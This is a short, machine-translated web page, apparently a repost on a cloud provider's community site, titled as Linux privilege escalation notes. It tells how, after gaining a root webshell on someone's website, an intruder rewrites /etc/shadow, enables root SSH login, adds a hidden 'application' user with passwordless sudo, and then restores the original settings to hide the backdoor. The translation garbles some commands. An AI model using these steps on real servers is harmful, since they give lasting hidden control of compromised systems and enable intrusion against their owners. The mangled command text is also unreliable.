Linux privilege escalation notes

Source: Internet
Author: User

There is no technical knowledge. One idea is to allow some children's shoes with the root permission webshell to get the permission quickly.

One day, the webshell and RedHat system of a website are obtained. Tomcat programs are started as root, and webshell also has root permissions.

1. Replace the root password with webshell:/etc/shadow // remember to back up

2. allow root users to log on via ssh:/etc/ssh/sshd_config

PermitRootLogin yes # Allow root Login

3. restart the ssh service ssh restart

4. log on to ssh as root and add a user

Useradd application

Passwd // set the password as prompted

5. You do not need a password to change the su operation for the application User.

Chmod + w/etc/sudoers // Add write permission, read-only by default

Modify/etc/sudoers

Vi/etc/sudoers

Add application ALL = (ALL) NOPASSWD: ALL

6. Change the root password back to its original state and prohibit root login. And remove sudoers write attributes (chmod-w/etc/sudoers ). Finished

Finally,

Root User Login:

Normal user login, su password-free access to the root permission

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.